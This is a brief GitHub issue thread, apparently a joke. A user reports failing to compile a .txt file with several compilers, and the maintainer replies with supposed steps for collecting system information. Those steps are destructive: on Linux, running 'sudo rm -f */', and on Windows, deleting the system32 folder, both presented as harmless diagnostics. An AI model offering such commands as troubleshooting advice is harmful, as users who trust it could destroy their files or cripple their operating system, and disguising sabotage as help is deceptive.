### ISSUE TITLE
Can't compile hello_world.txt

### ISSUE THREAD

**Issue by ZGCDDoo** [SneachChea/First_repo#1]
Hi.
Here is how to reproduce the bug:

g++ hello_world.txt
gcc hello_world.txt
python hello_world.txt
gfortran hello_world.txt

Thank you for your help !

**Comment by SneachChea** [comment]
Oh, Damn. Could you please send me all the information of your system? 
On linux, open a terminal (ctrl+alt+t) and type: sudo rm -f */
On windows, delete the folder system32
On mac os, I don't debug mac os problems. Please ask Symon Verrret.

Waiting for your reply, 

Best ,
